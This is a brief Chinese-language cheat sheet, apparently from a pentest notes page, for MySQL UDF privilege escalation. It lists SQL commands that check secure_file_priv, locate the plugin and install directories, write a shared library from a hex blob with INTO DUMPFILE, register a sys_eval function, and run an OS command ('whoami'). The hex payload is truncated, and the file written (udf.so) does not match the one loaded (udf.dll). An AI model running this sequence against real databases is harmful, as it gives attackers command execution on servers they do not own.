MySQL UDF 提权对应的参考文章:MySQL 漏洞利用与提权,另外顺便附上t00ls UDF.PHP

show global variables like '%secure_file_priv%';
-- NULL:    不允许导入或导出
-- /tmp:    只允许导入导出到/tmp目录
-- 空:         不限制目录

show variables like '%plugin%';
--  获取MySQL 的插件目录

select @@basedir;
--  获取Mysql安装目录

SELECT 0x7f454c4602... INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';
--  写入动态链接库

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
--  创建自定义函数

select sys_eval('whoami');
--  执行命令